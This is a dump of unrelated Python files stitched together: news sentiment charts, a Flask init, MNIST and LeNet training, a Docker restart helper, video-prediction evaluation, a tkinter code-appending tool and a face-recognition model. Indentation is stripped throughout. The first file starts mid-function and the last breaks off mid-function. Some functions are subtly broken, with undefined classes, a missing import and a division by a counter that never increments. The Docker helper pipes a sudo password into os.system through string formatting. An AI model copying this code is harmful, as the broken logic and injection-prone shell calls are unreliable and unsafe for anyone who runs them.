plt.bar(range(len(neg_articles)), neg_articles, tick_label=['body','title','both'])
plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=['body','title','both'])
plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=['body','title','both'])
plt.legend(labels=['Negative','Neutral','Positive'])
plt.xlabel("Analysis for found articles")
plt.ylabel("% of total articles/headlines of a given sentiment")
plt.title(str(curr_week) + " sentiment analysis for '"+keyword+"'")
plt.show()
'''
def get_week(keyword):
neg_articles =[]
neu_articles =[]
pos_articles =[]
days = []
scores = []
for day in range(7):
curr_day = (datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%dT%H:%M:%S')
days.append((datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%d'))
prev_day =( datetime.now() - timedelta(days=7-day)).strftime('%Y-%m-%dT%H:%M:%S')
curr_week =( datetime.now() - timedelta(days=13-day)).strftime('%Y-%m-%dT%H:%M:%S')
articles = search4(keyword, prev_day, curr_day )
#print(articles)
totalArticles = articles["totalResults"]
if totalArticles >= 20:
totalArticles = 20
elif totalArticles ==0:
print("no results found")
continue
articles = articles['articles'][:totalArticles]
total_score_body = []
total_score_title = []
total_both = []
for art in articles:
total_score_title.append(sentiment_score_filtered(art['title']))
if art['content'] != None:
total_score_body.append(sentiment_score_filtered(art['content']))
else:
total_score_body.append(0.0)
total_both = list(total_score_body)
total_both.extend(total_score_title)
neg_articles.append(format2(totalArticles*2, len([ x for x in total_both if x < 0])))
neu_articles.append(format2(totalArticles*2, len([ x for x in total_both if x== 0])))
pos_articles.append(format2(totalArticles*2, len([ x for x in total_both if x > 0])))
mboth = round(mean(map(formatdata,total_both)),2)*100
scores.append(round(mboth))
# print(articles)
#print(days)
print("Scores of the week", scores)
print(days)
print(pos_articles)
print(neu_articles)
print(neg_articles)
#print("Overall Score:", mean(total_both))
calc2 = [ pos_articles[x] + neu_articles[x] for x in range(7)]
calc3 = [ pos_articles[x] + neu_articles[x] + neg_articles[x] for x in range(7)]
print(calc2)
#print(calc3)
'''
plt.bar(range(len(neg_articles)), neg_articles, tick_label=days)
plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=days)
plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=days)
plt.legend(labels=['Negative','Neutral','Positive'])
plt.xlabel("Analysis for found articles")
plt.ylabel("% of total articles/headlines of a given sentiment")
plt.title(str(days[6]) + " Past Week sentiment analysis for '"+keyword+"'")
plt.show()
'''
response = {
'maxscore': max(scores),
'minscore': min(scores),
'wscores': scores,
'wdata': {
'labels': days,
'datasets': [{
'label': '% Positive',
'data': pos_articles,
'pointRadius': 4,
'backgroundColor':
'rgba(0, 210, 91,0.4)',
'borderColor':
'rgba(0, 210, 91,0.8)',
'borderWidth': 5,
'fill':True
},
{
'label': '% Neutral',
'data': calc2,
'pointRadius': 4,
'backgroundColor':
'rgba(255, 171, 0,0.4)',
'borderColor':
'rgb(255, 171, 0,0.8)',
'borderWidth': 5,
'fill':True
},
{
'label': '% Negative',
'data': [100,100,100,100,100,100,100],
'pointRadius': 4,
'backgroundColor':
'rgb(252, 66, 74,0.2)',
'borderColor':
'rgb(252, 66, 74,0.8)',
'borderWidth': 5,
'fill':True
}]
}}
print(response)
return response
def main():
print("News Check 0.05:\n")
get_week("harris")
'''
while True:
timeframe, keyword = getInput()
if timeframe =="d":
print(get_day(keyword))
if timeframe =='w':
neg_articles =[]
neu_articles =[]
pos_articles =[]
days = []
scores = []
for day in range(7):
curr_day = (datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%dT%H:%M:%S')
days.append((datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%d'))
prev_day =( datetime.now() - timedelta(days=7-day)).strftime('%Y-%m-%dT%H:%M:%S')
curr_week =( datetime.now() - timedelta(days=13-day)).strftime('%Y-%m-%dT%H:%M:%S')
articles = search4(keyword, prev_day, curr_day )
#print(articles)
totalArticles = articles["totalResults"]
if totalArticles >= 20:
totalArticles = 20
elif totalArticles ==0:
print("no results found")
continue
articles = articles['articles'][:totalArticles]
total_score_body = []
total_score_title = []
total_both = []
for art in articles:
total_score_title.append(sentiment_score_filtered(art['title']))
if art['content'] != None:
total_score_body.append(sentiment_score_filtered(art['content']))
else:
total_score_body.append(0.0)
total_both = list(total_score_body)
total_both.extend(total_score_title)
neg_articles.append(format2(totalArticles*2, len([ x for x in total_both if x < 0])))
neu_articles.append(format2(totalArticles*2, len([ x for x in total_both if x== 0])))
pos_articles.append(format2(totalArticles*2, len([ x for x in total_both if x > 0])))
scores.append(mean(total_both))
# print(articles)
#print(days)
print("Scores of the week", scores)
#print("Overall Score:", mean(total_both))
calc2 = [ neu_articles[x] + neg_articles[x] for x in range(7)]
plt.bar(range(len(neg_articles)), neg_articles, tick_label=days)
plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=days)
plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=days)
plt.legend(labels=['Negative','Neutral','Positive'])
plt.xlabel("Analysis for found articles")
plt.ylabel("% of total articles/headlines of a given sentiment")
plt.title(str(days[6]) + " Past Week sentiment analysis for '"+keyword+"'")
plt.show()
'''
if __name__ == '__main__':
main() |
from flask import Flask
#from flask_sqlalchemy import SQLAlchemy
from .models import *
app = Flask(__name__)
#db = SQLAlchemy(app)
#db.init_app(app)
app.config.from_pyfile('config.py')
from app import views, models
|
import requests
import json
def quote_of_the_day():
try:
url = 'https://quotes.rest/qod/'
response = requests.get(url)
response_json = json.loads(response.text)
try: # Only 10 requests allowed per hour
quote = response_json[u'contents'][u'quotes'][0][u'quote']
quote_author = response_json[u'contents'][u'quotes'][0][u'author']
except KeyError:
quote = response_json[u'error'][u'code']
quote_author = response_json[u'error'][u'message']
quote_of_day = str(quote) + ' - ' + str(quote_author)
return quote_of_day
except Exception as e:
# TODO: Handle correct exceptions properly
print(e)
return "Error Beep Boop" |
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
from dataLoader import crypticLettersDataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
## load mnist dataset
use_cuda = torch.cuda.is_available()
root = './data'
if not os.path.exists(root):
os.mkdir(root)
trans = transforms.Compose( [ AddBackground(), transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
# if not exist, download mnist dataset
train_set = dset.MNIST(root=root, train=True, transform=trans, download=True)
test_set = dset.MNIST(root=root, train=False, transform=trans, download=True)
batch_size = 100
train_loader = torch.utils.data.DataLoader(
dataset=train_set,
batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(
dataset=test_set,
batch_size=batch_size,
shuffle=False)
print ('==>>> total trainning batch number: {}'.format(len(train_loader)))
print('==>>> total testing batch number: {}'.format(len(test_loader)))
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.Linear(4 * 4 * 50, 500)
self.fc2 = nn.Linear(500, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2, 2)
x = x.view(-1, 4 * 4 * 50)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
def name(self):
return "LeNet"
def pretrainMnist():
## training
model = LeNet()
if use_cuda:
model = model.cuda()
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
criterion = nn.CrossEntropyLoss()
for epoch in range(10):
# trainning
print(epoch)
ave_loss = 0
for batch_idx, (x, target) in enumerate(train_loader):
optimizer.zero_grad()
if use_cuda:
x, target = x.cuda(), target.cuda()
x, target = Variable(x), Variable(target)
out = model(x)
loss = criterion(out, target)
ave_loss = ave_loss * 0.9 + loss.data[0] * 0.1
loss.backward()
optimizer.step()
if (batch_idx + 1) % 100 == 0 or (batch_idx + 1) == len(train_loader):
print ('==>>> epoch: {}, batch index: {}, train loss: {:.6f}'.format(
epoch, batch_idx + 1, ave_loss))
# testing
correct_cnt, ave_loss = 0, 0
total_cnt = 0
for batch_idx, (x, target) in enumerate(test_loader):
if use_cuda:
x, target = x.cuda(), target.cuda()
x, target = Variable(x, volatile=True), Variable(target, volatile=True)
out = model(x)
loss = criterion(out, target)
_, pred_label = torch.max(out.data, 1)
#total_cnt += x.data.size()[0]
correct_cnt += (pred_label == target.data).sum()
# smooth average
ave_loss = ave_loss * 0.9 + loss.data[0] * 0.1
if (batch_idx + 1) % 100 == 0 or (batch_idx + 1) == len(test_loader):
print ( '==>>> epoch: {}, batch index: {}, test loss: {:.7f}, acc: {:.7f}'.format(
epoch, batch_idx + 1, ave_loss, float(correct_cnt) / float(total_cnt)))
torch.save(model.state_dict(), model.name())
def train():
model = LeNet()
state = torch.load('LeNet')
model.load_state_dict(state)
for param in model.parameters():
param.requires_grad = False
# Replace the last fully-connected layer
# Parameters of newly constructed modules have requires_grad=True by default
model.fc2 = nn.Linear(500, 23) # assuming that the fc7 layer has 512 neurons, otherwise change it
model.cuda()
dataset = crypticLettersDataset(root_dir = '/home/olya/Documents/thesis/data', transform = trans)
totalLen = len(dataset)
train_loader = torch.utils.data.DataLoader(dataset, batch_size=4, #shuffle=True,
sampler=SubsetRandomSampler(range(0,int(totalLen*0.8))))
test_loader = torch.utils.data.DataLoader(dataset, batch_size=4, #shuffle=True,
sampler=SubsetRandomSampler( range(int(totalLen*0.8), totalLen)) )
dataloader = DataLoader(dataset, batch_size=4,
shuffle=True, num_workers=4)
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
criterion = nn.CrossEntropyLoss()
test_loss = []
train_loss = []
test_accurancy =[]
train_accurancy = []
for epoch in range(100):
# trainning
total_train_loss = 0
total_train_loss_cnt=0
train_acc =0
for batch_idx, (target, x) in enumerate(train_loader):
optimizer.zero_grad()
if use_cuda:
x, target = x.cuda(), target.cuda()
x, target = Variable(x), Variable(target)
out = model(x)
loss = criterion(out, target)
loss.backward()
optimizer.step()
_, pred_label = torch.max(out.data, 1)
correct_cnt = (pred_label == target.data).sum()
train_acc+= int(correct_cnt)/float(x.data.size()[0])
total_train_loss += loss[0]
total_train_loss_cnt+=1
train_loss.append( total_train_loss / float(total_train_loss_cnt))
train_accurancy.append( train_acc/ float(total_train_loss_cnt))
# testing
correct_cnt = 0
total_test_loss = 0
total_test_loss_cnt = 0
test_acc = 0
for batch_idx, (target, x) in enumerate(test_loader):
if use_cuda:
x, target = x.cuda(), target.cuda()
x, target = Variable(x, volatile=True), Variable(target, volatile=True)
out = model(x)
loss = criterion(out, target)
_, pred_label = torch.max(out.data, 1)
correct_cnt = (pred_label == target.data).sum()
total_test_loss += loss[0]
total_test_loss_cnt +=1
test_acc += int(correct_cnt)/float(x.data.size()[0])
test_loss.append( total_test_loss / float(total_test_loss_cnt) )
test_accurancy.append( test_acc/ float(total_test_loss_cnt) )
if epoch ==0:
expected =[]
predicted =[]
for batch_idx, (target, x) in enumerate(test_loader):
if use_cuda:
x, target = x.cuda(), target.cuda()
x, target = Variable(x, volatile=True), Variable(target, volatile=True)
out = model(x)
loss = criterion(out, target)
_, pred_label = torch.max(out.data, 1)
expected += [ i for i in target.data.cpu().numpy()]
predicted += [ i for i in pred_label.data.cpu().numpy()]
y_actu = pd.Series(expected + [ i for i in range(22)], name='Actual')
y_pred = pd.Series(predicted+[ i for i in range(22)], name='Predicted')
df_confusion = pd.crosstab(y_actu, y_pred)
df = pd.DataFrame({'x': range(len(train_loss)), 'train': train_loss, 'test': test_loss, 'test_accurancy': test_accurancy, 'train_accurancy': train_accurancy} )
# multiple line plot
plt.plot('x', 'train', data=df, color='skyblue', linewidth=2, label='train')
plt.plot('x', 'test', data=df, color='olive', linewidth=2, label = 'test')
plt.legend()
plt.show()
plt.plot('x', 'train_accurancy', data=df, color='green', linewidth=2, label='train_accurancy')
plt.plot('x', 'test_accurancy', data=df, color='red', linewidth=2, label='test_accurancy')
plt.legend()
plt.show()
# first pretrain mnist and then train on letters
#pretrainMnist()
train()
class AddBackground( object ):
def __call__(self, sample ):
import numpy as np
sample = 255 - sample.numpy()
bg = _getBackground((28, 28))
for d in [0, 1, 2]:
bg[:, :, d][np.where(sample > 0)] = sample[np.where(sample > 0)]
return bg
def _getRandomBg():
import os
import random
bgFolder = '/home/olya/Documents/thesis/se/backgrounds'
allBg = os.listdir(bgFolder)
bgPath = random.choice(allBg)
bg = Image.open(bgPath)
return bg
def _getBackground(shape):
import random
inw, inh = shape
image = _getRandomBg()
w, h = image.shape
x = random.randint(0, w - inw)
y = random.randint(0, h - inh)
crop = image.crop((x, y, x + inw, y + inh))
return crop
|
import os
def sudo_run(password, command):
os.system("echo {pwd}|sudo -S {cmd}".format(pwd=password, cmd=command))
if __name__ == '__main__':
pwd = ""
sudo_run(pwd, command="docker stop /node1")
sudo_run(pwd, command="docker stop /node2")
sudo_run(pwd, command="docker stop /node3")
sudo_run(pwd, command="docker stop /node4")
sudo_run(pwd, command="docker rm /node1")
sudo_run(pwd, command="docker rm /node2")
sudo_run(pwd, command="docker rm /node3")
sudo_run(pwd, command="docker rm /node4")
sudo_run(pwd, command="docker network create --subnet=10.10.0.0/16 kv_subnet")
# sudo_run(pwd, command="docker network create --subnet=10.10.0.0/16 kv_subnet2")
sudo_run(pwd, command="docker build -t cse138/kv-store:4.0 /home/jumpsnow/PycharmProjects/-cse138_assignment4")
# sudo_run(pwd, command="docker build -t kv-store:4.0 /home/jumpsnow/PycharmProjects/-cse138_assignment4") |
a=int(input("Enter a num to check whether it's prime or not: "))
flag=True
for i in range(2,a):
if(a%i==0):
flag=False
break
if flag:
print("Num is prime")
else:
print("Num is not prime") |
import os
import cv2
import sys
import time
import ssim
import imageio
import tensorflow as tf
import scipy.misc as sm
import scipy.io as sio
import numpy as np
import skimage.measure as measure
from os import listdir, makedirs, system
from os.path import exists
from argparse import ArgumentParser
from skimage.draw import line_aa
from PIL import Image
from PIL import ImageDraw
import glob
sys.path.append("../")
from bi_conv_lstm_model import bi_convlstm_net
from utils import *
def main(lr, batch_size, alpha, beta, image_size_h, image_size_w, K, T, B, convlstm_layer_num, num_iter, gpu, cpu,
concatconv, quantitative, qualitative,
load_pretrain, tf_record_train_dir, tf_record_test_dir, color_channel_num, dec, no_store, pixel_loss,
pretrain_model, mode,
dyn_enc_model, reference_mode, debug, print_train_instead, dis_length, Unet, no_d, fade_in, use_gt,
res_mode, gif_per_vid):
data_path = "../../../data/KTH/"
f = open(data_path + "test_data_list.txt", "r")
testfiles = f.readlines()
c_dim = 1
iters = 0
best_model = None # will pick last model
prefix = ("KTH_convlstm"
+ "_image_size_h=" + str(image_size_h)
+ "_image_size_w=" + str(image_size_w)
+ "_K=" + str(K)
+ "_T=" + str(T)
+ "_B=" + str(B)
+ "_convlstm_layer_num=" + str(convlstm_layer_num)
+ "_dis_length=" + str(dis_length)
+ "_batch_size=" + str(batch_size)
+ "_alpha=" + str(alpha)
+ "_beta=" + str(beta)
+ "_lr=" + str(lr)
+ "_mode=" + str(mode)
+ "_fade_in=" + str(fade_in)
+ "_no_d=" + str(no_d)
+ "_use_gt=" + str(use_gt)
+ "_res_mode=" + str(res_mode)
+ "_pixel_loss=" + str(pixel_loss)
+ "_concatconv=" + str(concatconv)
+ "_Unet=" + str(Unet))
checkpoint_dir = "../../models/KTH/" + prefix + "/"
device_string = ""
if cpu:
device_string = "/cpu:0"
elif gpu:
device_string = "/gpu:%d" % gpu[0]
with tf.device(device_string):
# test batch size has to be 1
model = bi_convlstm_net(dec=dec, image_size=[image_size_h, image_size_w], c_dim=color_channel_num,
dis_length=dis_length, K=K, T=T, B=B, convlstm_layer_num=convlstm_layer_num, batch_size=1,
checkpoint_dir=checkpoint_dir, debug=debug, reference_mode=reference_mode, mode=mode,
Unet=Unet, use_gt=False, res_mode=res_mode, pixel_loss=pixel_loss, concatconv=concatconv)
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
config = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
tf.global_variables_initializer().run()
print checkpoint_dir
loaded, model_name = model.load(sess, checkpoint_dir, best_model)
if loaded:
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed... exitting")
return
quant_dir = "../../results/quantitative/KTH/" + prefix + "/"
save_path = quant_dir + "results_model=" + model_name + ".npz"
if not exists(quant_dir):
makedirs(quant_dir)
vid_names = []
length = B * (K + T) + K
psnr_err = np.zeros((0, length))
ssim_err = np.zeros((0, length))
for i in xrange(len(testfiles)):
tokens = testfiles[i].split()
vid_path = data_path + tokens[0] + "_uncomp.avi"
while True:
try:
vid = imageio.get_reader(vid_path, "ffmpeg")
break
except Exception:
print("imageio failed loading frames, retrying")
action = vid_path.split("_")[1]
if action in ["running", "jogging"]:
n_skip = 3
else:
n_skip = T
start = int(tokens[1])
end = int(tokens[2]) - length - 1
if gif_per_vid != '-1':
end = min(end, max(start + 1, start + (gif_per_vid - 1) * n_skip + 1))
for j in xrange(start, end, n_skip):
print("Video " + str(i) + "/" + str(len(testfiles)) + ". Index " + str(j) +
"/" + str(vid.get_length() - length - 1))
folder_pref = vid_path.split("/")[-1].split(".")[0]
folder_name = folder_pref + "." + str(j) + "-" + str(j + T)
vid_names.append(folder_name)
savedir = "../../results/images/KTH/" + prefix + "/" + folder_name
seq_batch = np.zeros((1, image_size_h, image_size_w,
length, c_dim), dtype="float32")
for t in xrange(length):
# imageio fails randomly sometimes
while True:
try:
img = cv2.resize(vid.get_data(j + t), (image_size_h, image_size_w))
break
except Exception:
print("imageio failed loading frames, retrying")
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
seq_batch[0, :, :, t] = transform(img[:, :, None])
true_data = seq_batch.copy()
pred_data = np.zeros(true_data.shape, dtype="float32")
seq_batch_tran = create_missing_frames(seq_batch.transpose([0, 3, 1, 2, 4]), K, T)
forward_seq = seq_batch_tran
conv_layer_weight = np.zeros((convlstm_layer_num), dtype=np.float)
conv_layer_weight[-1] = 1
pred_data[0] = sess.run(model.G,
feed_dict={model.forward_seq: forward_seq,
model.target: seq_batch,
model.conv_layer_weight: conv_layer_weight,
model.conv_layer_index: convlstm_layer_num - 1,
model.loss_reduce_weight: conv_layer_weight[convlstm_layer_num - 1],
model.is_dis: False,
model.is_gen: False})
if not os.path.exists(savedir):
os.makedirs(savedir)
cpsnr = np.zeros((length,))
cssim = np.zeros((length,))
for t in xrange(length):
pred = (inverse_transform(pred_data[0, :, :, t]) * 255).astype("uint8")
target = (inverse_transform(true_data[0, :, :, t]) * 255).astype("uint8")
if quantitative:
cpsnr[t] = measure.compare_psnr(pred, target)
cssim[t] = ssim.compute_ssim(Image.fromarray(cv2.cvtColor(target,
cv2.COLOR_GRAY2BGR)),
Image.fromarray(cv2.cvtColor(pred,
cv2.COLOR_GRAY2BGR)))
# pred = draw_frame(cv2.cvtColor(pred,cv2.COLOR_GRAY2BGR), t % (T + K) < K)
if qualitative:
blank = (inverse_transform(seq_batch_tran[0, t, :, :]) * 255).astype("uint8")
cv2.imwrite(savedir + "/pred_" + "{0:04d}".format(t) + ".png", pred)
cv2.imwrite(savedir + "/gt_" + "{0:04d}".format(t) + ".png", target)
cv2.imwrite(savedir + "/blk_gt_" + "{0:04d}".format(t) + ".png", blank)
if qualitative:
cmd1 = "rm " + savedir + "/pred.gif"
cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
"/pred_%04d.png " + savedir + "/pred.gif")
cmd3 = "rm " + savedir + "/pred*.png"
# Comment out "system(cmd3)" if you want to keep the output images
# Otherwise only the gifs will be kept
system(cmd1);
system(cmd2); system(cmd3);
cmd1 = "rm " + savedir + "/gt.gif"
cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
"/gt_%04d.png " + savedir + "/gt.gif")
cmd3 = "rm " + savedir + "/gt*.png"
# Comment out "system(cmd3)" if you want to keep the output images
# Otherwise only the gifs will be kept
system(cmd1);
system(cmd2); system(cmd3);
cmd1 = "rm " + savedir + "/blk_gt.gif"
cmd2 = ("ffmpeg -f image2 -framerate 7 -i " + savedir +
"/blk_gt_%04d.png " + savedir + "/blk_gt.gif")
cmd3 = "rm " + savedir + "/blk_gt*.png"
system(cmd1);
system(cmd2); system(cmd3);
if quantitative:
print psnr_err.shape, cpsnr.shape
print ssim_err.shape, cssim.shape
psnr_err = np.concatenate((psnr_err, cpsnr[None,:]), axis=0)
ssim_err = np.concatenate((ssim_err, cssim[None,:]), axis=0)
if quantitative:
np.savez(save_path, psnr=psnr_err, ssim=ssim_err)
print("Results saved to " + save_path)
print "PSNR average:", np.mean(psnr_err), "SSIM average", np.mean(ssim_err)
print("Done.")
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--lr", type=float, dest="lr",
default=0.0001, help="Base Learning Rate")
parser.add_argument("--batch_size", type=int, dest="batch_size",
default=8, help="Mini-batch size")
parser.add_argument("--alpha", type=float, dest="alpha",
default=1.0, help="Image loss weight")
parser.add_argument("--beta", type=float, dest="beta",
default=0.02, help="GAN loss weight")
parser.add_argument("--image_size_h", type=int, dest="image_size_h",
default=128, help="Mini-batch size")
parser.add_argument("--image_size_w", type=int, dest="image_size_w",
default=128, help="Mini-batch size")
parser.add_argument("--K", type=int, dest="K",
default=1, help="Number of frames of gt per block")
parser.add_argument("--T", type=int, dest="T",
default=3, help="Number of frames synthesized per block")
parser.add_argument("--B", type=int, dest="B",
default=5, help="number of blocks")
parser.add_argument("--convlstm_layer_num", type=int, dest="convlstm_layer_num",
default=2, help="number of convlstm layers")
parser.add_argument("--num_iter", type=int, dest="num_iter",
default=100000, help="Number of iterations")
parser.add_argument("--gpu", type=int, nargs="+", dest="gpu", default=0,
help="GPU device id")
parser.add_argument("--cpu", action="store_true", dest="cpu", help="use cpu only")
parser.add_argument("--Unet", action="store_true", dest="Unet", help="use Unet")
parser.add_argument("--load_pretrain", action="store_true", dest="load_pretrain", help="load_pretrain")
parser.add_argument("--tf_record_train_dir", type=str, nargs="?", dest="tf_record_train_dir",
default="../../../tf_record/KTH/train/", help="tf_record train location")
parser.add_argument("--tf_record_test_dir", type=str, nargs="?", dest="tf_record_test_dir",
default="../../../tf_record/KTH/test/", help="tf_record test location")
parser.add_argument("--color_channel_num", type=int, dest="color_channel_num",
default=1, help="number of color channels")
parser.add_argument("--dec", type=str, dest="dec", default="deconv",
help="deconv or depool")
parser.add_argument("--dyn_enc_model", type=str, dest="dyn_enc_model", default="mix",
help="dynamic encoding model")
parser.add_argument("--reference_mode", type=str, dest="reference_mode", default="two",
help="refer to how many frames in the end")
parser.add_argument("--debug", action="store_true", dest="debug", help="debug mode")
parser.add_argument("--no_d", action="store_true", dest="no_d", help="debug mode")
parser.add_argument("--fade_in", action="store_true", dest="fade_in", help="fade_in")
parser.add_argument("--use_gt", action="store_true", dest="use_gt", help="use_gt")
parser.add_argument("--no_store", action="store_true", dest="no_store", help="no_store")
# one, mix, or close(not recommend)
parser.add_argument("--res_mode", type=str, default="mix", dest="res_mode", help="res_mode")
parser.add_argument("--pixel_loss", type=str, default="l2", dest="pixel_loss", help="pixel_loss")
parser.add_argument("--print_train_instead", action="store_true",
dest="print_train_instead", help="print_train_instead of test")
parser.add_argument("--dis_length", type=int, dest="dis_length",
default=11, help="number frames to be sent in discriminator")
parser.add_argument("--pretrain_model", type=str, dest="pretrain_model",
default="", help="")
parser.add_argument("--concatconv", action="store_true", dest="concatconv", help="concatconv")
parser.add_argument("--gif_per_vid", type=int, dest="gif_per_vid", default=1,
help="refer to how many per video")
parser.add_argument("--mode", type=str, dest="mode",
default="bi_one_serial", help="number frames to be sent in discriminator")
parser.add_argument("--quantitative", action="store_true", dest="quantitative", help="quantitative")
parser.add_argument("--qualitative", action="store_true", dest="qualitative", help="qualitative")
args = parser.parse_args()
# from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
# print_tensors_in_checkpoint_file(
# file_name='../../models/KTH/KTH_convlstm_image_size_h=128_image_size_w=128_K=1_T=3_B=5_convlstm_layer_num=2_dis_length=11_batch_size=16_alpha=1.0_beta=0.02_lr=0.0001_mode=bi_one_serial_fade_in=False_no_d=True_use_gt=True_res_mode=mix_pixel_loss=l2_concatconv=True_Unet=True/bi_conv_lstm.model-100001',
# tensor_name='', all_tensors=False)
# exit()
main(**vars(args))
|
from tkinter import *
from tkinter.ttk import *
import os
from tkinter import filedialog
from tkinter import messagebox
root=Tk()
root.config(bg="white")
root.geometry("800x480")
root.title("Add Image")
Label(root,text="Pick the Image location from the disk:",font=("Verdana",15),background="white").pack()
def loc():
limage=filedialog.askopenfilename(parent=root,title="Pick the image",filetypes=[('PNG file (*.png)', '*.png')]);
rootname=open("temp.txt",'r')
product=open("product.py",'a+')
product.write("\nrimage=PhotoImage(file=\""+limage+"\")")
product.write("\nLabel("+rootname.readline()+",image=rimage).pack()")
rootname.close()
product.close()
messagebox.showinfo("Succesful","Image Added Successfully")
Button(root,text="Pick",command=loc).pack()
mainloop()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import mxnet as mx
import random
import sklearn
from sklearn.decomposition import PCA
from time import sleep
from easydict import EasyDict as edict
#import facenet
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'align'))
import detect_face
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_image
import face_preprocess
def ch_dev(arg_params, aux_params, ctx):
new_args = dict()
new_auxs = dict()
for k, v in arg_params.items():
new_args[k] = v.as_in_context(ctx)
for k, v in aux_params.items():
new_auxs[k] = v.as_in_context(ctx)
return new_args, new_auxs
def do_flip(data):
for idx in xrange(data.shape[0]):
data[idx,:,:] = np.fliplr(data[idx,:,:])
class FaceModel:
def __init__(self, args):
model = edict()
with tf.Graph().as_default():
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.2
sess = tf.Session(config=config)
#sess = tf.Session()
with sess.as_default():
self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(sess, None)
self.threshold = args.threshold
self.det_minsize = 50
self.det_threshold = [0.4,0.6,0.6]
self.det_factor = 0.9
_vec = args.image_size.split(',')
assert len(_vec)==2
self.image_size = (int(_vec[0]), int(_vec[1]))
_vec = args.model.split(',')
assert len(_vec)==2
prefix = _vec[0]
epoch = int(_vec[1])
print('loading',prefix, epoch)
self.model = edict()
self.model.ctx = mx.gpu(args.gpu)
self.model.sym, self.model.arg_params, self.model.aux_params = mx.model.load_checkpoint(prefix, epoch)
self.model.arg_params, self.model.aux_params = ch_dev(self.model.arg_params, self.model.aux_params, self.model.ctx)
all_layers = self.model.sym.get_internals()
self.model.sym = all_layers['fc1_output']
def get_aligned_face(self, img, force = False):
#print('before det', img.shape)
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
#if bounding_boxes.shape[0]==0:
# fimg = np.copy(img)
# do_flip(fimg)
# bounding_boxes, points = detect_face.detect_face(fimg, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
if bounding_boxes.shape[0]==0 and force:
print('force det', img.shape)
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, [0.3, 0.3, 0.1], self.det_factor)
#bounding_boxes, points = detect_face.detect_face_force(img, None, self.pnet, self.rnet, self.onet)
#print('after det')
if bounding_boxes.shape[0]==0:
return None
bindex = 0
nrof_faces = bounding_boxes.shape[0]
det = bounding_boxes[:,0:4]
img_size = np.asarray(img.shape)[0:2]
if nrof_faces>1:
bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
img_center = img_size / 2
offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
offset_dist_squared = np.sum(np.power(offsets,2.0),0)
bindex = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
det = bounding_boxes[:,0:4]
det = det[bindex,:]
points = points[:, bindex]
landmark = points.reshape((2,5)).T
#points need to be transpose, points = points.reshape( (5,2) ).transpose()
det = np.squeeze(det)
bb = det
points = list(points.flatten())
assert(len(points)==10)
str_image_size = "%d,%d"%(self.image_size[0], self.image_size[1])
warped = face_preprocess.preprocess(img, bbox=bb, landmark = landmark, image_size=str_image_size)
warped = np.transpose(warped, (2,0,1))
print(warped.shape)
return warped
def get_all_faces(self, img):
str_image_size = "%d,%d"%(self.image_size[0], self.image_size[1])
bounding_boxes, points = detect_face.detect_face(img, self.det_minsize, self.pnet, self.rnet, self.onet, self.det_threshold, self.det_factor)
ret = []
for i in xrange(bounding_boxes.shape[0]):
bbox = bounding_boxes[i,0:4]
landmark = points[:, i].reshape((2,5)).T
aligned = face_preprocess.preprocess(img, bbox=bbox, landmark = landmark, image_size=str_image_size)
aligned = np.transpose(aligned, (2,0,1))
ret.append(aligned)
return ret
def get_feature_impl(self, face_img, norm):
embedding = None
for flipid in [0,1]:
_img = np.copy(face_img)
if flipid==1:
do_flip(_img)
#nimg = np.zeros(_img.shape, dtype=np.float32)
#nimg[:,ppatch[1]:ppatch[3],ppatch[0]:ppatch[2]] = _img[:, ppatch[1]:ppatch[3], ppatch[0]:ppatch[2]]
#_img = nimg
input_blob = np.expand_dims(_img, axis=0)
self.model.arg_params["data"] = mx.nd.array(input_blob, self.model.ctx)
